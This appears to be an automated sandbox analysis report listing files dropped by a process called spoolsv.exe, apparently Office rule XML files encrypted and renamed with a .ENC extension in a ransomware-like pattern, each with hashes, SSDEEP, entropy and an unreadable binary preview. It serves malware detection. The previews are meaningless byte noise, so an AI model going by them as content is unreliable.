                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.862184372407821
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/6gFrNld0NbQlG/V4Reiogls7orl0GgK1s7cedaQuwdU+7FmbvR/2Zxg:/6gFvd0GE/rZ17orYYMaF85M/2Zm
                                                                                                                                                                                                                                                      MD5:52F343A8CD894A2889A489831F54C817
                                                                                                                                                                                                                                                      SHA1:C726B3760EA899BE508AC18CAB5B1A0059BA5C40
                                                                                                                                                                                                                                                      SHA-256:AB1DE3C017304D0E62D6733F250A578F64DFAEFB04F3B0E08BE1BA18BCAFE4CB
                                                                                                                                                                                                                                                      SHA-512:9C8928ECACC984C5412CAC88651F83C8BC10ADA819D4F68AF07D3BB3F7AD5616A5F1988CB0FC2DEEA9B383D98E98026317E6A18D12E53FEB2BFE2CE0FC1FCAA2
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....dk..YY..HT.[.......L.FV..'..i.J)lKL.U..".X...-......U........XN.U.44..mV..Z......K.7bc.X..,.e......+%...O.,.&......v<..].<.....q.....~.l^fG.O7r...Zfy..5b=...Dj2..8.OF2....I........ic..b..9S.+I.x..G{.D........m-..J....J.{D../......X.-.h.v.8.... ..l....m..7..D3.`...F.Z.t.9.'.._.db...r^.&...9T...r..4.....e...))`"...&..."...>.,..xf..*.v.."/...&Ls..g ....n...nx.......s.FD0.=...&M.7.qm.!..xP...c...Z.y...Xa...S_.&.b........}i..G..............K...s.J\OM-.....(.*.>.K=..I...q.r.j.q.."^AYc.......s...mb|O..........F.......4..B..<:....SZ].._:'9.:.Ls...!.i"0..G...]..<h_m,..2A.....Q.."..;.gahw.....n(z7...<.........i.K..8....A.<..7.......4'.-.R......4...Km..\;!..,l... idt.6...8.z..y.7.#@>..../ ..&....J...TS....g.B^.i.L@u..Q.=se`.*.,>..$..-...\..&.!.....KSuP]...z{xz.I..+.%Kf...$....j.......YY7...Cb~..s.v ...W.4.*L+-FX.<.^..o....]......P.w.kV.%.(1y.zr0..%.Du.$..S.Y....5l..x)N.!z1aC*...2...##N.u8

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702150v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.847150203404709
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/1gWJNBgBTzZT06R7KijPvNXli1l8W/k1v4pVkFCCyR2TaNBszWAt8TgH27tY:/iWJU5ztnRWijPfi1++VkFm5+aAtg1q
                                                                                                                                                                                                                                                      MD5:01702285140B1081A9208CF57E82CEEF
                                                                                                                                                                                                                                                      SHA1:F83350A9B5D4F9B2C52E4C1988B77A781A2458DC
                                                                                                                                                                                                                                                      SHA-256:662F642A7F50BD0677FC8E56304F9C11CC027577733E5E9F548C11B24AF801CF
                                                                                                                                                                                                                                                      SHA-512:252C94C398F7526EFD42A0E6E5F4A31F4C4C047299BD346D0E9FAF784E529316860111AE62755ACBFB281AF178B2ADFDE0B42FCF549FE34B85CE55EE1792D17C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.R._E.r.....]..&+.....=O...N...,..L.sks.b(......G3g."gl.q...B.KS...e....3.@...6.X..6./..-`...Z2.}mE....2....v.'....nSH.E..........4...U...@.o.y....,.2...--{s@=...p:.......\.....<....P4..(.-GX<.7!.RXB...;{.. UtD....R8.T...?..){+..Cy.A.|J..B$.U...-9..x.T?.a....EZ...(...=...0V..%DM_..s.=Au....V.o.. .......MId.^.c.oz..-..`.-o..."..U......$.4>. l..{.._rk..I.M..-.y.6,...?F..h.o.ak./K).E..!T*`<_.&.Ez...P...Ab.....VE.r$.....Al:=e*....O..O......K1....V.....x.O%.;).wU...S.......-......i.r....>..G../_....|.....kq.q..)..Di..g.ixa..L..A./.7Y~;y..2...'..(..O....5.g%D...N..Tl.q"t...X......5..-..s.].`o...k..y....+x...b...`eS....-.e......`.U|....U|3QCj.&D...Yb.M2..|d.a.....t.\vj.X9G...C....S.^..c..k.......BM..+.m..-.].p.c.....,..O..W.uI.Vj....x....d...8.&...?.....(...y;6..|.$.6..S[.n..l.......y...g2....A.....$.i.N...l/..a.>.....l'".I.3.......(. \O.....b)ByP.........nR@XZ....b...w....~.JR89..f..jy.s.....yr...K....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702151v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.865619837235076
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/EdC4xWNj1yCEnG+LFfS5svpBSLNoXgsLPsNXNsxaD8gJJ/Pwek/HOOeyS:/Jtz+LcIpaoQysdsYPJJ/IeoHHpS
                                                                                                                                                                                                                                                      MD5:E142363996B3FCAD9F3AE8866A419BB5
                                                                                                                                                                                                                                                      SHA1:8266C4BE9A0C4423CE72184CBF8C448AD3CB88C6
                                                                                                                                                                                                                                                      SHA-256:D606AAE7D6AC65AC5E8113FD6FA80C5D82970CB436546C0BF44AEA47FE4F16EC
                                                                                                                                                                                                                                                      SHA-512:57D8F05ACF1E36853CDCF093F09A7A573053D6EDD96AA37003E8A308C83E78089900A5079DAF4EE7163EA3D1FDC7ED95A95026D45FCC8463865CE51D7ECE51EE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t......&..-[.M...c.....&B..X.$.+E...%3Z.x...r.%hL_.@<..0.......?.4....Y"6:O......Y.."...r.n..x..2;zF..w.....\.:......K.Z.?Y..j.....~.q..&.N...:;..Ljah..h.;..=V......F%.."*.uh.}....Do...P.T?3l...ba.KEs6..8.m.`..o....=^........U......3....M..G.J.X..S.*.?.+..^,..q..{.M...2@`......'d..=a.._.2..4s`.<.?.7...IF..6Db.d...V..].=M2...&z17S"...U..#.YK.....0.6.(.'......\[.(.7....0....u$.s.T.....7.jPJ>t.$v.T.Q...<..m.q]|.e..Vi._.>........J.P..S..ya...W.I....%.K.......6...../A=.........[.C..zjx....w.4....-.:d..|....&....]...sr}..`._xW.3..v..._...d...&k.....j%.x.....@T.ZO.!0'.6i.<....c1Q.......*.0*iGY...=IT.O.k........PL.......U.s.s#g...M...hfk.$.a........<"MW=.....6.%.!...4..}.rR."....u.....uN_[d....&...(....5WY...V..B.5L~.\o8.r..ZP..V..n.y..q.Z...*a...@t.....^..m....V..`b....}Y,.>.J..r....!......V}..?.^..#.8.Qg...hKB.....s.Sx......M.7...J.w.&.....Wt....nm..U'`..B.]...<.K......:...6.yp.y....$<.+..n.U..jA.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702200v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.831533020844836
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/QLrpgyXmjtYa7ngqrSyQN0hoVePYY3pbLjLSKbT4ppTpeeSL6cBNnS4QeYJPyIh:/UrHXmJRnNSyReunjLtbT4ppTpeeCxBO
                                                                                                                                                                                                                                                      MD5:B1CF19A551AA0431913CEC0D9741580D
                                                                                                                                                                                                                                                      SHA1:F7A5BBA10E7A7903ABAEE5C8C28F28B730ADC9DE
                                                                                                                                                                                                                                                      SHA-256:8C85FADE722DF14FE20C7992BDD23A2C167894B70C7844469BABAAB8E29DB6D5
                                                                                                                                                                                                                                                      SHA-512:AF66E55A8DC98911C367E4299DC5CCD2F620F278B3322C7B3EBFBF623F112CA65E75F868DFD42B275CFCCB243E8E48974DCD69BF948C0E27DECB8E663A9D3CEC
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....z.).?...:.\O..}.\@....8.j.......d.$.$.U-W(.E*.........o.N.R...#G3..k..B...u.(.7.6....+..K.5.%..1.|z(Q..6~<!3....x..o=.|..........#.MQ..\ .q...j...LV.....$F.....C'..9<.....p.V.. W...z..jm..:.1UE.p..M...4gbw..........s.-...#E.>f?b.D..r.\A......s7WI.?9......\.aF.2.-...7.)~B.......Z.z..K<.........k$.......s..:.k.|)....Tth.hXkV..&....bs.*.H.UF..v.....b.i..@1.......}......a.q....m..g....W@.F. .D*4......`D5..$.z..$..[\.F..+..W..g..,#......f`. .........f...3.;x<..8Y<.=l...W.$b..".h.M.'y.N.&..@....8.....-l...c.fe..\....<g..`KX.`..._... .....L...!x.n4.......O.K.`.D...M...F@......M..]Un...2..n.#X...IL.. wk........?`.#.......k.5..K.60..._h.D}.%.T.}..h....HKKR1..7......q.l.p...!...[D)..p.=.j.@,..M.21R..-.?..?.....|.R.SQ...kO...;N%...3.......p...j2.<tl....PR....,.5\...fm,.....~.n.sxT....'.....88A...D;U.6........*i....;Z...8..?.Y....hk....+...P3.b.v........]....<c..F........y.......g.....?.T.A+.s...2

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702201v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.879804127671696
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/FpaO2RksRmpR6Kpu39ZbqNn2nqSsCuGJGSdpzzRZp3wj/DWU0mJIIOPcu/XDzfy:/FkOUDsRqzeNnCyLMFFZmzDh0mJ8Pn/y
                                                                                                                                                                                                                                                      MD5:9344E7EA15EE38E0083258C81BBAE827
                                                                                                                                                                                                                                                      SHA1:1D2A08CB4EB41EE8041A8A5B3C8BE8622B0C0DF4
                                                                                                                                                                                                                                                      SHA-256:30FD544439D913A8B0A726DA64F6C4CDABDAAC86CD2CDF768D6347CD8D44D3B7
                                                                                                                                                                                                                                                      SHA-512:60CB56C7DD3DDBC81BC61D02A999E03843DC88FDE4D8E2B9DC426B7ABB202160D8B16D474C9304DB98B73978C52A746FCFC710481F4B509CE63C0DB63EEA6C5D
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....7....C.n..-e...........Y........Y..Q.Z.._%...q..1s.iQOf\....P{.k..~SN3..)....E.@...s......V..8H....E.....G..A._.t.IF.Ptk.R...I..\...bk.d.....P8e$.)m6]..7....Zs..g...?!.2.wK))U.Q.j.Q..~.&.......8.#.~...M.\(...@...\U...._..E_Y.j.L..F..]X.7=.u.V%..).2...V...!.S..}.b.E......2...a.]...{...|?.......@..C.4....E....hw..4sl.........X..``:}.H.i..". ...Zw.D|..j..+.....K**......1..c..LHiv.l.{........H.w........[/y}FQ.ZDI.=.0..8.;....f..c../...1.m.....1LRJ.)..XIC...'.../.....g.-......q...n..PW.X....3.0...:.,{.......U..7Gz......Opg....r:.1G.|$(..R....5..../H.H.... ._.L...sQy..y..y.....5...?6.....Y.|....?.....b.../.c...6-.iz/u....p.u..H*'Q.h..D....~b... ....l.a.#...}.5.gRC(....O'7v7.};..A.5.....B'..0./AU./W...maSM..s.qz?}.^a..0..t#Hy?..[~..."9l.0.........v..S.S,.H..1..%...!.d.o....:['S...T..4.....>........o~K1.....v/q..=....8.i.mO\e..n...@......5.;D.~"'y...s.6....7.9...>m...t....?.....0.5..0...:>

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702250v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.881413030624899
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/0vLNByfAQQ1drMm9kUQoSDjBx68NO1Tn0RWE78tIZ2MC2P9HnCMDV:/0D8AQqZRIinGqIZ2ANV
                                                                                                                                                                                                                                                      MD5:9280FC76890B54BAD35BA1FCD5770759
                                                                                                                                                                                                                                                      SHA1:9EBBA3088EA77B34611BEA2D1BCF45A59722CA7E
                                                                                                                                                                                                                                                      SHA-256:44DA11A043D7D2F5281ABB4EF080F08550E299CB7A6F933CA2F6CDC43C81BA4B
                                                                                                                                                                                                                                                      SHA-512:F3BE16303C6750BC157609E0DD8CF3CE6ADAE5F71A18C991B59694C3D17845884A291B6FAFEA7D05D986BD5FEDA404AAFEA17AD71CC0A08DB6CD1EEFCE336403
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...Lj.w.x...Qb-^.J\..l'...~...'.1._...cpZ........>.ay6?.j...=..PC.7`.`..,....H..De.....p1..)b.$.....t...CDz..9.9.$.!........q......0...^...NFN u...U..U...4..y....e.[.^....|..4..0eX:.iq/.%/iO.A...%....VHm...R...?....?...T....w.f{....P......1..S{.`B...L..............|.Q..v,e..5.%..G.4..HN.(......a......GB.....D6......m......2qV...'.....R..3.Q.P.......f....]j'.bbs..........&p.Z...V.......jh!...(.!..........=.:...p<K......jZX`..?.....%V....!..~B..j.k..w...F$a..A....c....SF.b..&[..y".@."M...|V.....S....K.......y1.(...Z.4../..zD.,2.l=K.=...W.......0..JQ.|W.;..Q...1i...aZ...r..qX...Z...I...1...{..%.S.u.8...@..9...._'..R...-..(2.<..sz.V.g.'.....y.D.n.u.m~..H.y{ ..1.Fhcn...DN.t)..IQ..GTj...4~.......%....D{.S........4.L-~.G........%2|_ ..D......}M{...`..G.Fb%....:....s.S.'9@.P\..^......dq).....D4.}-......... Ia.Q..7P*..}IB.@.n...DG......3...fF..j..N.x*....[es.E....N....M....p.nE.n...S.>*. ..l&.w.C_

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702251v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.848917000422782
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/d3xgXZhFeJ71xF7nMcUB8v1HjpyuXD+WwEDwiTdKGcDoSfcQ:/dsLMJHF7M/8vZTpcodzczcQ
                                                                                                                                                                                                                                                      MD5:C73244E2683B7ADC0C3C98F2A46D6370
                                                                                                                                                                                                                                                      SHA1:8988D2A8BA16AF5501FA65489FAA6D06ECA09786
                                                                                                                                                                                                                                                      SHA-256:135F6833AD7E899F061B333CFF3BF5C76E3AF59F6AB8213AD23B66ECD71E84ED
                                                                                                                                                                                                                                                      SHA-512:588804C9BD2D406EF57CD786E84EFF775D0566005866C47683BD90FAA25FCBF0E0D0E56FF975D311955AFA4752220B8DB48B10D36B51349E5B6CBD49D93BEF6F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.,.......I....?.d.....U,....5l.XW..z~7...u.....PZ.:.Y.a4......\.`.........y~.D0..&.?!*_ ..h........;.u.Fc..S2.....`|.Y.!H8.MN.1.x&}....8Q......b..Q{.hbd..M:.:...gb<...f..X..j.L..;..=.{\q......g.FE,N...>.'..P.)..k..m&.lCs...g.TEK.g]..0.2..D40..5s.mK......4...Pj.p....qV....x..ZHC."..0..[..W.o.."w.....=..r.......l..S..)..B.=.;.h..f..\..}k..L.=.......z..h].(q.n/0$'...5....u.O...-....?a%..<[...y.A.o.F.u..Z..%.........^5..z....lf.eB...........H"......mq7..I.D...b..|5..H~.W.../.(..3.TUq.x.`.N.f.....m1...eu$;..Z...te.^Oi.i.....ld...U..O.y..zX=.....^...p...=..W.,.../..z..=.%G...v....j..i.^...F..?.r.\.$./RI.n....J....^r.x..\....*............:..F.......\#..i.B.....r......^.Wr..?..a..e.l;B.Q.;...J%.......zW.b. ...b.@.e......Z.34.K.5.e...I...;=.Qm...*...M.Yq.a..~..M....d2'W'.-..:..{.1.@...1...S.F.cU.8.,.]D..?.~O.\....p;,....D...8..s(.X[......mk.....7.u.Q.....a..m...&......A.....Hic`....@

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702300v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.860998368627328
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/8my/btXwwKngcdqLcUftmITWsrk4Rp2EpPaJJ1di:/fy5wlngcdqLcU8aWyRp2ZJJri
                                                                                                                                                                                                                                                      MD5:8C3FC05885E50030F0E9AE4B25A0583A
                                                                                                                                                                                                                                                      SHA1:EDADF6ADF20FE3A4F1F6D7AAC360EE5185AABB7D
                                                                                                                                                                                                                                                      SHA-256:8914DF3C9DC1B1617D31C7AB31068611FDC361F9BFDA4E0AAB20C20AF1817AD4
                                                                                                                                                                                                                                                      SHA-512:BD3E29343E4D979F9EC8FEC682C99EBAF4E833ADEB8159B071B2E8D178AA92C3491DD54E32CD35BBE7196BB188C40EB659B4360B3AD6442142F9717FF356306C
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....d-/./...[.{r..5.:..IJ..}>..... .t...LR..g2F..U.q..}>....V;X.a...y..<>6.e..-*..sv./.S.BT..>....S...R....d<..A..~..]@.U&....}.l..d...UV1.-=.....ZM.f.{...*].OP.M..!.>^A...B..,....{...=.i....d.B..........q8.\......].......g...(...LX..n.(f6..E...j.e....)..^..T....X..*..5F. pb.wV.NI$.2n^.S.!...^...'.<..+.....QX.....~.4e...3../.%...b.^]..>J:...H....s. %{.`].U..<{+gIHy...v.....`.x...U6 ..&....H.N...!.M1..".u..k.B..56....../#.i..g....S.........VC9....jj.Q.4.F.(yL./.w...|h.J...#}.z5..ah.G........~.`...bu.Q1..b7;..x....x..5J.I5..}vQ..3k...V...,.`.....~....z.f.E........HXq..H..=_7.e7..6.\x.......:...=...5?0........~....:h,.y^"..cC.=Nj..e..X?....R.[..0hI.0].Z....=^..(.m...k0.......Q....w....FG.K\F....LMx#.O......._..N.I...2.|...Y.........H.7...............D......s.&..V.>..Cq..u...D..>.....PpN...A+........Z....C0...n.3GP{..)x!.M)..\..WFXTx.(D3..O....&../.~.....O9.s...bJa|.eO...Z...p....R.C...b&<I...u

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702301v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.860308651086524
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/HWqL8RIJrWeFn8AF7EIpkeeTjyyCs6YFd59su2KaLB7vJwaHdceeWXKtfdhzdZ:/HOW8G7HmeGj17X6lFwUdceMtJZ
                                                                                                                                                                                                                                                      MD5:0E763B08F425E16A360B23A14EAAF461
                                                                                                                                                                                                                                                      SHA1:69A55A81111638BE5B76394065D646B5E6F43C62
                                                                                                                                                                                                                                                      SHA-256:F9AC280C43659EB5D9A753F4AB6D3F4406DD873D4CE75BD083ED262631552FC8
                                                                                                                                                                                                                                                      SHA-512:0DC5BD10D98B3D5DB30F808BA612B95C9A57590483F867A1D650E1CFE317CF3E0E7371386432AF52E09E29E87C9FAE107F2ADAC39C208A33313397165F57A293
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.4..7.Y2...!.{.8.o..B@..;.J.r.)yVzs.#.........Bh.O.C...6....u..&.5.8k>.....N....[...5..Q......Z_.Gr.\`....q..i$..^.g..b(.q..j7..x.-L-.G......b..J..c. .....}...R.M.....L...}.RV4.}e!{.-<.....].n.Y..7.....K..../.z..<...:...1.$.x..L....1..f.....A`.f.5..I...p.&a)y.Z.-/...5...C..Q..=.|f...c.."..N.u.`.+....X.....v'..........fWx.WK...I>...K...|.te0.Y?e..]..s.:k..C.x.8.#.6}.(...".......{.....k.....hq.b...4.4gX.acX....3....5.?JZk.^ _.U.2..rW%.2J..!}q'.....,.k......%...x..y..2.RhT..........X.o.2On...g#....iX...L.A... Qf7.|3...".6,.2..........X..Ic`...^..#9'1:..'.`..{m.f.o.g...U.d.B,....W.u....q,....|5..^.."_....,h....k."#~..-.R..P.%G....U$v.........P..j..&.#U.2.o.\$bO..~.......K}.].J ...........7.o...J.4~=.$.t.47.8QS.PH&...o..[IFX?o..sL5O!..>........@$...7./.........@...@...p..Y.< .......J.}..:.c ..xo@R..4..L.x....._g...c.~.T.A.B0.7+WO&.W.`c.j..b..R&....+...1.8..u.(..n....G|.u......K..zZ.l.(y..R1.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702350v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                                                                                                      Entropy (8bit):7.871359056170022
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/gLgdesYFg9UsUvWVlHs863nQ3NtY4SJj/s7XB4ubI/IYPL/YXkHrKN:/DdesKrsYWVi8qQ7TS9/y2isIKY0mN
                                                                                                                                                                                                                                                      MD5:2B0C7FEEBF80EB64068B8BDC976CC658
                                                                                                                                                                                                                                                      SHA1:491DAD9FE9CBFC5F08597CDC0D1C6437C5428960
                                                                                                                                                                                                                                                      SHA-256:5844A8D4BA1D80D35728CE96619EF41A8EEB7DB32B2354C511471A5666CC2EC0
                                                                                                                                                                                                                                                      SHA-512:83C02D31704EB9A78CDC563C59D497F30CF5B2CFAEB408C59A7A82BE47F551D1D5FCFF449B544DF02382D193C8EBBF9A87876E90C67207DFDA9498DDC9886423
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..|....1.q.oJ..UG.v.~t.....^.......].....`[..".z...F....\2K)....ce.o..'}|/.....ji....0.x.^......w......K.*b..NM|......+N...l.>..z..;X.tz.X...l.B.K.|...X(H.^N.v..L.t..C.D.X...T.........X...F"1.H.8..=}l.K..!..g_:.0.,E...).j/..5>....q.r.$.C...O.o..f...n.....G..$...(...ww..r.@OL..}j....l..o..;$.^y.38..@.!K....U..YFq....b..........]=4.".N..'..z._...q..._J..v..._Q...v..^....A.Q...%.....]....b_....38.d<.v.O..}...U.(....h...j(.$V.0.4. ..:q.d../...'.P.hZj+..J$v..9.$<...u*+.tU.......<.<0T....;.~.s.e.PA>@.......!#8H.}Qnka.e_....*;....-.;>.o6...2X.g.?.|~!$...f.._...:.XxA.f-II....Dh.T.XO.;.6../..'...+..]Z2.A...-.......H.j...-`......bQ.cP..V,.(....[q.w'..7.....kK@.7...c...Q.t. {.h.....C...=y3....?WL.}...k......r>......n..2n...(V...F..q>oj7,.[.-..y.i..8.0..0....L../....C.GNl.O..G.6-..m......<&.h....W[^...S....:.(. .9......q........_C....|`...P.")E...:....4....Md\....D.^.0..h.z.N..5}...x...7..4.......

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702351v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.852548675718738
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/FCpNvBtenMyuKj3fl8Xuo4u7NEKmF3nC:/FCrva/jLduvN+nC
                                                                                                                                                                                                                                                      MD5:47E07C433A787EC068114E380150CFD4
                                                                                                                                                                                                                                                      SHA1:4DCDB6C4CCFBC0919E6B502C1906F4E81C02E0A0
                                                                                                                                                                                                                                                      SHA-256:1B99DCF240A0EA5C229F8EC42B308B6A431EEF9397F4A3820840DA4D9FC80002
                                                                                                                                                                                                                                                      SHA-512:D3F6F86D1F3297F653E65E0E9702D269440EA970918713D417A8413EDB18A471BDE1B6A9C74EC17BF9BC7AF696579630A6DCC4730C807F9F14D64022BF1C6787
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..]^;\.*w.K......,.........ct..ud....B.iu..L.jJ..)..-v.n*6\....]....-3....).....1...<.k. .........G.._........e.2O.".N.A..F......h.....v7d.h.ZI).......z.g..qH......@........wh.#a9.5w...gQ..R.9...,z.Jx.y.q/...:....Q|.!...r...n.....<y.l..W.`vW[...D.6b6..#h0.0l..<Q.......2..$..G%.....W.......)....yd@.#...\>j`...&h....o.._.$.._.p.9......pRj..r..5E...i.{/U..u-.o....iPA*7...>_...|...W.V.z..`.(Be..|.6(.........H..4..6.E.jM....Lsn.*..L..+......g.b..m...R..$.2....v..k.'.....a=.W.~ J..b...0.+/.@~..<.a.]..a>...7.b....5..Vsz;..w.l/......Yu.$Yx...+........Vr....}....#.`)..6..c....v.........h....J...##..k....W.aB...wRJ...=.f..w..9....<....z.h....67X+...E.$..V..O.w.-l.Q9......a.;...s..-..EP7...=..;.....o.s..;..eB...3BQ..).F..%....`..yu.a...%...j...P~.f...p cF..+A.3a]..8.@....txA"...D.....S..x....0.N2,R*..Ba...B...2&.x.KlX.2.... e..;.^.z.L.......V].....na............M..Q.SF^..._J......B.W\.....MD...N.rw..p..s

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702400v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.854446498292337
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/esevqI2iZYrRWb/jJ4lrHBYiCCl+qoltPwOGLMCFUOW3/RAEoBGJm:/eLvTYrRsuJHmBTlcwCFU6Om
                                                                                                                                                                                                                                                      MD5:A6F6AB750FBC389EF9B288FB4DCD1EB7
                                                                                                                                                                                                                                                      SHA1:B0E42E557F17B9878ACA22CDCCB33F61F04B7C13
                                                                                                                                                                                                                                                      SHA-256:12043F936F6362BB9321FEDA3B84EDFB32265BDFB50533F4E9B640D0BC653AAF
                                                                                                                                                                                                                                                      SHA-512:E0EE37DCE86F49A053A778F5ED062953F2237B1E07F574E525828B60DEDE6E27E4CD92ED985A38F13C7B8EDB356DA0C285DFEC88A9F9C02E6DF700CE58428896
                                                                                                                                                                                                                                                      Malicious:false
